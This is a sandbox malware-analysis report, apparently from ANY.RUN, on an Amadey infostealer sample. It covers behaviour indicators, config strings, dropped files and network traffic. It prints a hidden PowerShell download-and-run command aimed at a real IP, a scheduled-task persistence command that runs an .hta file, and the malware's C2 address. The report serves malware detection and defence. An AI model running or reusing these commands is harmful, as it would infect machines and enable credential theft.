| File name: | d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe |
| Full analysis: | https://app.any.run/tasks/b8594b01-4525-48ef-8fae-f0ef0489b049 |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | May 16, 2025, 16:53:57 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections |
| MD5: | 81D750507053AE8581F5A32477F32274 |
| SHA1: | F7455786C9953EE1CA5BB15F3991AF6F0A7FF831 |
| SHA256: | 9E3D1A116B798CCA91FBD8BE34010F315E4BA5E8BDA1F613BECBC798865C99F8 |
| SSDEEP: | 49152:hPPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtBOXo:dP/mp7t3T4+B/btosJwIA4hHmZlKH2TO |
MALICIOUS
Uses Task Scheduler to run other applications
- cmd.exe (PID: 7756)
Run PowerShell with an invisible window
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Request from PowerShell that ran from MSHTA.EXE
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
AMADEY mutex has been found
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
- ramez.exe (PID: 8172)
- ramez.exe (PID: 5548)
- ramez.exe (PID: 7356)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 1532)
Script downloads file (POWERSHELL)
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
AMADEY has been detected (SURICATA)
- ramez.exe (PID: 8172)
Connects to the CnC server
- ramez.exe (PID: 8172)
AMADEY has been detected (YARA)
- ramez.exe (PID: 8172)
SUSPICIOUS
Starts CMD.EXE for commands execution
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
Found IP address in command line
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Manipulates environment variables
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 7788)
- mshta.exe (PID: 5332)
Starts process via Powershell
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Probably download files using WebClient
- mshta.exe (PID: 7788)
- mshta.exe (PID: 5332)
Connects to the server without a host name
- powershell.exe (PID: 7924)
- ramez.exe (PID: 8172)
- powershell.exe (PID: 7252)
Process requests binary or script from the Internet
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Executable content was dropped or overwritten
- powershell.exe (PID: 7924)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
Reads security settings of Internet Explorer
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
- ramez.exe (PID: 8172)
Starts itself from another location
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
Potential Corporate Privacy Violation
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Contacting a server suspected of hosting an CnC
- ramez.exe (PID: 8172)
There is functionality for enable RDP (YARA)
- ramez.exe (PID: 8172)
There is functionality for taking screenshot (YARA)
- ramez.exe (PID: 8172)
The process executes via Task Scheduler
- ramez.exe (PID: 7356)
- ramez.exe (PID: 5548)
INFO
The sample compiled with english language support
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
Reads mouse settings
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
Create files in a temporary directory
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
Reads Internet Explorer settings
- mshta.exe (PID: 7788)
- mshta.exe (PID: 5332)
Checks supported languages
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
- ramez.exe (PID: 8172)
- ramez.exe (PID: 5548)
- ramez.exe (PID: 7356)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 1532)
Auto-launch of the file from Task Scheduler
- cmd.exe (PID: 7756)
Reads the computer name
- d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe (PID: 7736)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
- ramez.exe (PID: 8172)
Checks proxy server information
- powershell.exe (PID: 7924)
- ramez.exe (PID: 8172)
- powershell.exe (PID: 7252)
- slui.exe (PID: 7568)
Disables trace logs
- powershell.exe (PID: 7924)
- powershell.exe (PID: 7252)
Process checks computer location settings
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
The executable file from the user directory is run by the Powershell process
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 8108)
- TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE (PID: 1532)
Manual execution by a user
- mshta.exe (PID: 5332)
Reads the software policy settings
- slui.exe (PID: 7568)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Amadey
(PID) Process(8172) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)lv:
msi
Kaspersky Lab
av:
|
#
"
\App
00000422
dm:
Powershell.exe
ProgramData\
ps1
rundll32
http://
Content-Disposition: form-data; name="data"; filename="
SOFTWARE\Microsoft\Windows NT\CurrentVersion
dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
id:
VideoID
cred.dll|clip.dll|
0000043f
cmd
00000423
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
-executionpolicy remotesigned -File "
2022
------
2016
og:
\0000
CurrentBuild
2019
:::
S-%lu-
" && timeout 1 && del
ProductName
Panda Security
ESET
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/k
+++
?scr=1
Doctor Web
GET
SYSTEM\ControlSet001\Services\BasicDisplay\Video
/quiet
.jpg
d610cf342e
vs:
sd:
rundll32.exe
"taskkill /f /im "
pc:
random
=
360TotalSecurity
<d>
wb
Content-Type: multipart/form-data; boundary=----
Startup
Norton
&& Exit"
os:
https://
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
2025
Avira
%-lu
zip
POST
"
Content-Type: application/octet-stream
Rem
/te4h2nus/index.php
------
5.34
<c>
clip.dll
AVAST Software
\
shell32.dll
" && ren
e3
ramez.exe
kernel32.dll
DefaultSettings.XResolution
d1
DefaultSettings.YResolution
185.156.72.96
r=
cred.dll
--
GetNativeSystemInfo
-%lu
ComputerName
&unit=
Keyboard Layout\Preload
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
ar:
Sophos
%USERPROFILE%
exe
e1
e2
st=s
Programs
0123456789
un:
rb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd /C RMDIR /s/q
Bitdefender
-unicode-
AVG
WinDefender
&&
shutdown -s -t 0
Comodo
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
Main
TRiD
| .exe | | | Win64 Executable (generic) (76.4) |
|---|---|---|
| .exe | | | Win32 Executable (generic) (12.4) |
| .exe | | | Generic Win/DOS Executable (5.5) |
| .exe | | | DOS Executable Generic (5.5) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2025:05:16 15:43:00+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14.16 |
| CodeSize: | 633856 |
| InitializedDataSize: | 326144 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x20577 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 0.0.0.0 |
| ProductVersionNumber: | 0.0.0.0 |
| FileFlagsMask: | 0x0000 |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (British) |
| CharacterSet: | Unicode |
Total processes
137
Monitored processes
16
Malicious processes
10
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1532 | "C:\Users\admin\AppData\Local\TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE" | C:\Users\admin\AppData\Local\TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 5332 | mshta C:\Users\admin\AppData\Local\Temp\4K7teb7LH.hta | C:\Windows\System32\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5548 | "C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe" | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | — | svchost.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 7244 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7252 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7356 | "C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe" | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | — | svchost.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 7568 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7736 | "C:\Users\admin\Desktop\d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe" | C:\Users\admin\Desktop\d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 7756 | C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn S8RFKma1UIe /tr "mshta C:\Users\admin\AppData\Local\Temp\4K7teb7LH.hta" /sc minute /mo 25 /ru "admin" /f | C:\Windows\SysWOW64\cmd.exe | — | d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7764 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
14 907
Read events
14 884
Write events
23
Delete events
0
Modification events
| (PID) Process: | (7788) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7788) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7788) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (7924) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
Executable files
2
Suspicious files
2
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cdj0fznt.nqk.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_q3jxoo1s.xax.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_smd3i1lu.zc5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ys4yv3by.reh.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8108 | TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE | C:\Windows\Tasks\ramez.job | binary | |
MD5:E24DB6F29B4F5DB8ADC443BD6F6E4B44 | SHA256:B6382B8CF58F4CC0741631BB8832DFDBF211815964B646E9DB0893ED57D50DC8 | |||
| 8108 | TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE | C:\Users\admin\AppData\Local\Temp\d610cf342e\ramez.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 7736 | d65d7e8220fcc8124f9ec3f06945e043db9861f0386af.exe | C:\Users\admin\AppData\Local\Temp\4K7teb7LH.hta | html | |
MD5:C21DDDA48A71EE1E1C1958045816361C | SHA256:8BEA1C8DF753C3CBD9D17FA233D5DB7925758B358544F810044DB8060985E339 | |||
| 7924 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:5A08466A62C8A8AEE6ABEB04F748D826 | SHA256:7B2440F8DE84357EA0AE22858E09151BDB8A6606E0A3AE021CB4401B85370893 | |||
| 7924 | powershell.exe | C:\Users\admin\AppData\Local\TempLPXS2OCKTVYD5YAJ40JER4O57OWWMMPJ.EXE | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
44
DNS requests
14
Threats
14
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
7924 | powershell.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/testmine/random.exe | unknown | — | — | unknown |
7252 | powershell.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/testmine/random.exe | unknown | — | — | unknown |
8172 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | malicious |
8172 | ramez.exe | POST | 200 | 185.156.72.96:80 | http://185.156.72.96/te4h2nus/index.php | unknown | — | — | malicious |
5800 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
5800 | SIHClient.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
5800 | SIHClient.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5800 | SIHClient.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
5800 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5800 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
7924 | powershell.exe | 185.156.72.2:80 | — | Tov Vaiz Partner | RU | unknown |
8172 | ramez.exe | 185.156.72.96:80 | — | Tov Vaiz Partner | RU | malicious |
7252 | powershell.exe | 185.156.72.2:80 | — | Tov Vaiz Partner | RU | unknown |
5800 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5800 | SIHClient.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
5800 | SIHClient.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
login.live.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
7924 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 34 |
7924 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
7924 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
7924 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
7924 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
7924 | powershell.exe | Misc activity | ET INFO Packed Executable Download |
8172 | ramez.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 34 |
8172 | ramez.exe | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |
7252 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
8172 | ramez.exe | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Response |